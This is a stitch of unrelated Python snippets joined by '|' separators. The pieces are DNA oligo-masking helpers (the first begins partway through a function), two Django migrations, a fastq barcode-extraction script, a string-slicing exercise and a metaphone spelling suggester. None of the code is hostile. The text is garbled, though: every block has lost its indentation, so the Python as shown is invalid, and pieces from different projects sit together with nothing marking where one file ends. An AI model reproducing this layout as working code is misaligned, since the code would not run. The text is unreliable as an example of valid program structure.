for i in range(len(ls[0])):
for j in range(len(ls)):
tmp += [ls[j][i]]
return tmp
def split_list(seq, length):
return [seq[i:i+length] for i in range(0, len(seq), length)]
def probeNames(oligos,probeName):
output = []
for i in range(len(oligos)):
output += [[seq.percentGC(oligos[i])*100, oligos[i], probeName + '_' + str(i+1)]]
return output
def mask_runs(inseq,thechar,runlength,mismatches):
outseq = [0]*len(inseq)
for i in range(len(inseq)-runlength+1):
count = 0
for j in range(i,i+runlength):
if inseq[j] == thechar:
count += 1
if count >= runlength-mismatches:
outseq[i:i+runlength] = [1]*runlength;
return outseq
def mask_to_badness(mask,mer_length):
Inf = float('Inf')
out = list(mask)
for i in range(len(mask)):
if mask[i] > 0:
for j in range(max(0,i-mer_length+1),i+1):
out[j] = Inf
return out
def mask_oligos_with_runs(inseq,thechar,runlength,mismatches,oligolen):
outseq = [0]*len(inseq)
for i in range(len(inseq)-oligolen+1):
tmp = inseq[i:i+oligolen]
rn = mask_runs(tmp,thechar,runlength,mismatches)
if sum(rn)>0:
outseq[i] = 1
return outseq
def getacgt(inseq):
a = float(inseq.count('a'))/len(inseq)
c = float(inseq.count('c'))/len(inseq)
g = float(inseq.count('g'))/len(inseq)
t = float(inseq.count('t'))/len(inseq)
return [a,c,g,t]
def bad_acgt(inseq):
tmp = getacgt(inseq)
bd = tmp[1] >= 0.40 or tmp[2] >= 0.40 or tmp[1] <= 0.10 or tmp[2] <= 0.10
if bd:
out = 1
else:
out = 0
return out
def GC_badness(inseq,oligolen):
badness = [0]*len(inseq)
for i in range(len(inseq)-oligolen+1):
tmp = inseq[i:i+oligolen]
badness[i] = bad_acgt(tmp)
return badness
def remove_short_runs(inmask,n,tolerance):
# From an array of 1s and 0s, removes all runs of 1s <= n in length.
# For n=20, tolerance=2, you will remove all runs <18 in length,
# or all runs of 20 in length with 2 0s in the middle.
out = [0]*len(inmask)
for i in range(len(inmask)):
if inmask[i]:
temp = inmask[i:i+n]
if sum(temp) >= n-tolerance:
out[i:i+n] = inmask[i:i+n]
return out
def convert_mask_to_seq(inseq,mask,chr):
# takes all places where mask > 0 and converts the character of inseq to chr
output = list(inseq)
for i in range(len(mask)):
if mask[i]>0:
output[i] = chr
return ''.join(output)
|
# Generated by Django 3.2.13 on 2022-06-28 17:49
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('contacts_app', '0002_alter_person_unique_together'),
]
operations = [
migrations.AlterModelOptions(
name='person',
options={'ordering': ['first_name']},
),
]
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.17 on 2018-12-27 12:23
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('edtech', '0003_auto_20181226_2043'),
]
operations = [
migrations.AddField(
model_name='userquestionanswer',
name='session_end',
field=models.BooleanField(default=False),
),
]
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Standard library packages.
import re
import sys
from itertools import izip
# Others.
import seeq
from gzopen import gzopen
def trimSuffix(matcher, txt):
return matcher.matchPrefix(txt, False) or ''
######## Mapping Pipeline ###############################################
def extract_reads_from_PE_fastq(fname_iPCR_PE1, fname_iPCR_PE2):
"""This function takes the 2 pair-end sequencing files and extracts
the barcode making sure that the other read contains the
transposon."""
# This is the scarcode that allows to identify which
# experiment is sequenced (must be CT).
matcher = seeq.compile('CGCTAATTAATGGAATCATG', 3)
outf1 = open('CT_TCT.fasta', 'w')
outf2 = open('CT_ACG.fasta', 'w')
# There are many errors in the index, especially in the
# first base. The most frequent errors are hard coded
# in the dictionary so that the reads are written to the
# proper file.
outfiles = {
'TCT': outf1,
'GCT': outf1,
'ACT': outf1,
'ACG': outf2,
'AGG': outf2,
'CCG': outf2,
}
with gzopen(fname_iPCR_PE1) as f, gzopen(fname_iPCR_PE2) as g:
for lineno,(line1,line2) in enumerate(izip(f,g)):
# Take sequence lines of the fastq files.
if lineno % 4 != 1: continue
brcd = trimSuffix(matcher, line1)
# If we find a barcode between 13 and 25 nucleotides
# then the scarcode must have been the right one.
if len(brcd) < 13 or len(brcd) > 25: continue
# Remove first 25 nucleotides.
suff = line2.rstrip()[25:].split('CATG')[0]
# Cut genome fragment after the first CATG.
genome = re.sub(r'CATG.*', 'CATG', suff)
# Avoid short strings that are unmappable.
if len(genome) < 20:
genome = 'gatcctgatgctagtgactgatgagctgctgaagctgga'
# The first 3 nucleotides of the reverse read are the
# index. Check that it belongs to the right group.
idx = line2[:3]
if idx in outfiles:
outf = outfiles[idx]
outf.write('>%s\n%s\n' % (brcd,genome))
if __name__ == '__main__':
extract_reads_from_PE_fastq(sys.argv[1], sys.argv[2])
|
# 01234567890123
parrot = "Norwegian Blue"
print(parrot)
print(parrot[3])
print(parrot[4])
print(parrot[9])
print(parrot[3])
print(parrot[6])
print(parrot[8])
print(parrot[-5])
print(parrot[-11])
print(parrot[-10])
print(parrot[-5])
print(parrot[-11])
print(parrot[-8])
print(parrot[-6])
print(parrot[0:6])
print(parrot[:6] + parrot[6:])
print(parrot[-4:12])
print(parrot[0:6:2])
number = "9,223;372:036 854,775;807"
seperators = number[1::4]
print(seperators)
values = "".join(char if char not in seperators else " " for char in number).split()
print([int(val) for val in values])
|
import metaphone
def plausibleWords(incorrectWord):
USengDict = open("enUS.txt","r")
GBengDict = open("enGB.txt","r")
phoneticDictUS = open("metaphonicDictUS.txt","r")
phoneticDictGB = open("metaphonicDictGB.txt","r")
temp = (metaphone.dm(incorrectWord))[0]
plausibleList = []
plausibleListTemp = []
ctr = 0
for line in phoneticDictUS:
if line[:-1] == temp:
plausibleListTemp.append((ctr,"USprimary"))
ctr = ctr + 1
ctr = 0
for line in phoneticDictGB:
if line[:-1] == temp:
plausibleListTemp.append((ctr,"GBprimary"))
ctr = ctr + 1
linesUS = USengDict.readlines()
linesGB = GBengDict.readlines()
for i in xrange(len(plausibleListTemp)):
if plausibleListTemp[i][1] == "USprimary":
plausibleList.append(linesUS[plausibleListTemp[i][0]][:-1])
else:
plausibleList.append(linesGB[plausibleListTemp[i][0]][:-1])
return plausibleList |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.